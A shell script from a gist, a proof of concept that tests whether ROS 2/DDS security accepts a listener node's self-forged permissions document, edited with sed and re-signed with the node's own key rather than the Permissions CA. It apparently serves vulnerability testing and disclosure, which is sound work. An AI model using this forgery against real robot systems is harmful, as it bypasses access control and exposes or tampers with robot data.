@vmayoral
Created February 25, 2023 08:30
Proof of concept of Data Distribution Service (DDS) Chain of Trust (CoT) violation
#!/bin/sh
# msg TEXT...
# Step marker for the demo: emits one empty line on stdout, passes the
# banner text to the no-op `:` builtin, then pauses for two seconds.
msg() {
  printf '\n'
  # `:` prints nothing itself; the banner is only visible in the xtrace
  # output once `set -x` is active.
  : "=== $* ==="
  sleep 2
}
# Load the ROS 2 Foxy environment so the `ros2` CLI used below is on PATH.
. /opt/ros/foxy/setup.sh
# Trace every command from here on; this is also what makes the msg()
# banners visible.
set -x
msg "Creating keystore"
# Enable ROS 2 security with the Enforce strategy and point the keystore at
# the current directory.
export ROS_SECURITY_ENABLE=true
export ROS_SECURITY_STRATEGY=Enforce
export ROS_SECURITY_KEYSTORE=.
# The keystore and both enclaves are created in the current working
# directory, so run this from a scratch directory: key material and the
# generated XML files all end up here.
ros2 security create_keystore .
ros2 security create_key . /talker
ros2 security create_key . /listener
msg "Creating genuine permissions"
# node.xml: baseline profile shared by both nodes via XInclude from
# policy.xml. It grants publish on /rosout, subscribe on /clock, both
# directions on /parameter_events, and the per-node parameter services.
# It grants nothing on the application topics.
# The heredoc delimiter is unquoted, so the shell would expand `$` or
# backticks in the body; the body contains neither.
cat >node.xml <<POLICY
<?xml version="1.0" encoding="UTF-8"?>
<profile>
<topics publish="ALLOW">
<topic>/rosout</topic>
</topics>
<topics subscribe="ALLOW">
<topic>/clock</topic>
</topics>
<topics publish="ALLOW" subscribe="ALLOW" >
<topic>/parameter_events</topic>
</topics>
<services reply="ALLOW" request="ALLOW" >
<service>~/describe_parameters</service>
<service>~/get_parameter_types</service>
<service>~/get_parameters</service>
<service>~/list_parameters</service>
<service>~/set_parameters</service>
<service>~/set_parameters_atomically</service>
</services>
</profile>
POLICY
# policy.xml: the intended access policy. The /talker enclave may publish
# `chatter`; the /listener enclave may only subscribe to `something_else`.
# Under this policy the listener is NOT authorised to read `chatter`, which
# is the property the rest of the script puts to the test.
cat >policy.xml <<POLICY
<?xml version="1.0" encoding="UTF-8"?>
<policy version="0.2.0" xmlns:xi="http://www.w3.org/2001/XInclude">
<enclaves>
<enclave path="/talker">
<profiles>
<profile ns="/" node="talker">
<xi:include href="node.xml" xpointer="xpointer(/profile/*)"/>
<topics publish="ALLOW" >
<topic>chatter</topic>
</topics>
</profile>
</profiles>
</enclave>
<enclave path="/listener">
<profiles>
<profile ns="/" node="listener">
<xi:include href="node.xml" xpointer="xpointer(/profile/*)"/>
<topics subscribe="ALLOW">
<topic>something_else</topic>
</topics>
</profile>
</profiles>
</enclave>
</enclaves>
</policy>
POLICY
# launch.xml: starts the C++ demo talker and the Python demo listener, and
# sets ROS_SECURITY_ENCLAVE_OVERRIDE on each so that each process uses its
# own enclave (/talker and /listener respectively).
cat >launch.xml <<LAUNCH
<launch>
<node pkg="demo_nodes_cpp" exec="talker">
<env name="ROS_SECURITY_ENCLAVE_OVERRIDE" value="/talker"/>
</node>
<node pkg="demo_nodes_py" exec="listener">
<env name="ROS_SECURITY_ENCLAVE_OVERRIDE" value="/listener"/>
</node>
</launch>
LAUNCH
# Generate the permissions documents for both enclaves from policy.xml.
# These are the legitimate artefacts; the later step modifies the
# listener's copy (enclaves/listener/permissions.xml and permissions.p7s).
ros2 security create_permission . /talker policy.xml
ros2 security create_permission . /listener policy.xml
msg "Running nodes with correct permissions"
# Baseline run with the untouched permissions: launch both nodes in the
# background, let them run for 10 seconds, then stop the launch process.
# Per policy.xml the listener has no subscribe grant for `chatter` here, so
# this run is the reference to compare the second run against.
ros2 launch launch.xml &
sleep 10 && kill $!
msg "Creating malicious permissions document"
# For this step we are acting as a malicious node /listener. We do not
# access any files outside the enclaves/listener directory.
#
# The listener's permissions.xml is edited so that its grant for
# rt/something_else becomes a grant for rt/chatter (`rt/` is the prefix
# ROS 2 uses for DDS topic names), and permissions.p7s is regenerated with
# the cert.pem/key.pem found in the listener's own enclave directory
# (presumably the identity credentials issued by `ros2 security create_key`
# above), not with any CA key.
#
# NOTE(review): the defensive property under test is that a permissions
# document is accepted only when its signer is the Permissions CA itself,
# not merely a certificate that chains to that CA. A middleware that
# enforces this should refuse the re-signed file in the next run; confirm
# against the DDS vendor's advisories and fixed versions for the
# implementation in use.
sed -i -e's!rt/something_else!rt/chatter!' enclaves/listener/permissions.xml
openssl smime -sign -text -in enclaves/listener/permissions.xml \
-out enclaves/listener/permissions.p7s \
-signer enclaves/listener/cert.pem \
-inkey enclaves/listener/key.pem
msg "Running nodes with malicious permissions"
# Same launch as the baseline, now with the re-signed listener permissions.
# Compare against the first run: if the listener starts and receives
# `chatter` messages, the middleware accepted a permissions document that
# was not signed by the Permissions CA. A rejected permissions file (the
# listener failing to join or receiving nothing) is the expected secure
# outcome.
ros2 launch launch.xml &
sleep 10 && kill $!